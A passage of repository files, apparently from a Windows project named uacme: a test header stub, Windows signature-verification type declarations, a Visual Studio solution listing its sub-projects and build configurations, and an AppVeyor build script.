* Test unit header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
VOID TestActivationContext(
VOID
);
================================================
FILE: Source/Yuubari/wintrustex.h
================================================
#pragma once
typedef enum _SIGNATURE_INFO_TYPE {
SIT_UNKNOWN = 0x0,
SIT_AUTHENTICODE = 0x1,
SIT_CATALOG = 0x2
} SIGNATURE_INFO_TYPE;
#define SIF_AUTHENTICODE_SIGNED 0x1
#define SIF_CATALOG_SIGNED 0x2
#define SIF_VERSION_INFO 0x4
#define SIF_CHECK_OS_BINARY 0x800
#define SIF_BASE_VERIFICATION 0x1000
#define SIF_CATALOG_FIRST 0x2000
#define SIF_MOTW 0x4000
typedef enum _SIGNATURE_STATE {
SIGNATURE_STATE_UNSIGNED_MISSING = 0x0,
SIGNATURE_STATE_UNSIGNED_UNSUPPORTED = 0x1,
SIGNATURE_STATE_UNSIGNED_POLICY = 0x2,
SIGNATURE_STATE_INVALID_CORRUPT = 0x3,
SIGNATURE_STATE_INVALID_POLICY = 0x4,
SIGNATURE_STATE_VALID = 0x5,
SIGNATURE_STATE_TRUSTED = 0x6,
SIGNATURE_STATE_UNTRUSTED = 0x7,
} SIGNATURE_STATE;
typedef struct _SIGNATURE_INFO {
DWORD cbSize;
SIGNATURE_STATE SignatureState;
SIGNATURE_INFO_TYPE SignatureType;
DWORD dwSignatureInfoAvailability;
DWORD dwInfoAvailability;
PWSTR pszDisplayName;
DWORD cchDisplayName;
PWSTR pszPublisherName;
DWORD cchPublisherName;
PWSTR pszMoreInfoURL;
DWORD cchMoreInfoURL;
LPBYTE prgbHash;
DWORD cbHash;
BOOL fOSBinary; //True if the item is signed as part of an operating system release
} SIGNATURE_INFO, *PSIGNATURE_INFO;
typedef LONG (WINAPI *ptrWTGetSignatureInfo)(
LPWSTR pszFile,
HANDLE hFile,
ULONG sigInfoFlags, //SIF_*
SIGNATURE_INFO *siginfo,
VOID *ppCertContext,
VOID *phWVTStateData
);
================================================
FILE: Source/uacme.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.2.32616.157
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Akagi", "Akagi\uacme.vcxproj", "{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Fubuki", "Fubuki\dll.vcxproj", "{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}"
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "shared", "shared", "{49552A73-F1A4-44FA-94C0-5CDD84F48717}"
ProjectSection(SolutionItems) = preProject
Shared\consts.h = Shared\consts.h
Shared\libinc.h = Shared\libinc.h
Shared\shared.h = Shared\shared.h
Shared\util.c = Shared\util.c
Shared\util.h = Shared\util.h
Shared\windefend.c = Shared\windefend.c
Shared\windefend.h = Shared\windefend.h
EndProjectSection
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "NanoDesu", "NanoDesu", "{04845492-BD9E-4EC6-ACA4-4A0A460B3508}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Naka", "Naka\Naka.vcxproj", "{3BEF8A16-981F-4C65-8AE7-C612B46BE446}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Yuubari", "Yuubari\Yuubari.vcxproj", "{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Akatsuki", "Akatsuki\Akatsuki.vcxproj", "{07EF7652-1C2D-478B-BB4B-F9560695A387}"
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "minirtl", "minirtl", "{45D748AC-9B16-426E-808D-94662B0417F7}"
ProjectSection(SolutionItems) = preProject
Shared\cmdline.c = Shared\cmdline.c
Shared\minirtl.h = Shared\minirtl.h
Shared\rtltypes.h = Shared\rtltypes.h
Shared\strtoul.c = Shared\strtoul.c
Shared\u64tohex.c = Shared\u64tohex.c
Shared\_filename.c = Shared\_filename.c
Shared\_strcat.c = Shared\_strcat.c
Shared\_strcmp.c = Shared\_strcmp.c
Shared\_strcmpi.c = Shared\_strcmpi.c
Shared\_strcpy.c = Shared\_strcpy.c
Shared\_strend.c = Shared\_strend.c
Shared\_strlen.c = Shared\_strlen.c
Shared\_strncmp.c = Shared\_strncmp.c
shared\_strncmpi.c = shared\_strncmpi.c
Shared\_strncpy.c = Shared\_strncpy.c
Shared\_strstri.c = Shared\_strstri.c
EndProjectSection
EndProject
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "ntos", "ntos", "{876F1157-B68F-4D0A-B963-6157B266DDE5}"
ProjectSection(SolutionItems) = preProject
Shared\ntos\ntbuilds.h = Shared\ntos\ntbuilds.h
Shared\ntos\ntos.h = Shared\ntos\ntos.h
Shared\ntos\ntsxs.h = Shared\ntos\ntsxs.h
EndProjectSection
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
DebugConsole|Win32 = DebugConsole|Win32
DebugConsole|x64 = DebugConsole|x64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
ReleaseInternal|Win32 = ReleaseInternal|Win32
ReleaseInternal|x64 = ReleaseInternal|x64
ReleaseInternalConsole|Win32 = ReleaseInternalConsole|Win32
ReleaseInternalConsole|x64 = ReleaseInternalConsole|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|Win32.ActiveCfg = Debug|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|Win32.Build.0 = Debug|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|x64.ActiveCfg = Debug|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|x64.Build.0 = Debug|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|Win32.ActiveCfg = DebugConsole|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|Win32.Build.0 = DebugConsole|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|x64.ActiveCfg = DebugConsole|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|x64.Build.0 = DebugConsole|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Win32.ActiveCfg = Release|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Win32.Build.0 = Release|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.ActiveCfg = Release|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.Build.0 = Release|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|Win32
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternalConsole|x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternalConsole|x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.ActiveCfg = Debug|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.Build.0 = Debug|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|x64.ActiveCfg = Debug|x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|Win32.ActiveCfg = Debug|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|Win32.Build.0 = Debug|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|x64.ActiveCfg = Debug|x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|x64.Build.0 = Debug|x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|Win32.ActiveCfg = Release|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|Win32.Build.0 = Release|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|x64.ActiveCfg = Release|x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|x64.Build.0 = Release|x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|Win32.ActiveCfg = Debug|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|Win32.Build.0 = Debug|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|x64.ActiveCfg = Debug|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|x64.Build.0 = Debug|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|Win32.ActiveCfg = Debug|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|Win32.Build.0 = Debug|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|x64.ActiveCfg = Debug|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|x64.Build.0 = Debug|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.ActiveCfg = Release|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.Build.0 = Release|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.ActiveCfg = Release|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.Build.0 = Release|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|Win32.ActiveCfg = Debug|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|x64.ActiveCfg = Debug|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|x64.Build.0 = Debug|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|Win32.ActiveCfg = Debug|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|Win32.Build.0 = Debug|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|x64.ActiveCfg = Debug|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|x64.Build.0 = Debug|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|Win32.ActiveCfg = Release|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|x64.ActiveCfg = Release|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|x64.Build.0 = Release|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64
{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|Win32.ActiveCfg = Debug|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|x64.ActiveCfg = Debug|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|x64.Build.0 = Debug|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|Win32.ActiveCfg = Debug|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|Win32.Build.0 = Debug|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|x64.ActiveCfg = Debug|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|x64.Build.0 = Debug|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|Win32.ActiveCfg = Release|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|x64.ActiveCfg = Release|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|x64.Build.0 = Release|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64
{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(NestedProjects) = preSolution
{23A2E629-DC9D-46EA-8B5A-F1D60566EA09} = {04845492-BD9E-4EC6-ACA4-4A0A460B3508}
{3BEF8A16-981F-4C65-8AE7-C612B46BE446} = {04845492-BD9E-4EC6-ACA4-4A0A460B3508}
{07EF7652-1C2D-478B-BB4B-F9560695A387} = {04845492-BD9E-4EC6-ACA4-4A0A460B3508}
{45D748AC-9B16-426E-808D-94662B0417F7} = {49552A73-F1A4-44FA-94C0-5CDD84F48717}
{876F1157-B68F-4D0A-B963-6157B266DDE5} = {49552A73-F1A4-44FA-94C0-5CDD84F48717}
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {34101EC9-C266-4BF6-AC89-898FF5B54501}
EndGlobalSection
EndGlobal
================================================
FILE: appveyor.yml
================================================
version: 1.0.{build}
branches:
only:
- master
image: Visual Studio 2022
configuration: Release
platform: x64
clone_folder: c:\projects\uacme
build_script:
- cmd: msbuild Source\uacme.sln /m /v:normal /p:Configuration=Release /p:Platform=x64 /p:PlatformToolset=v143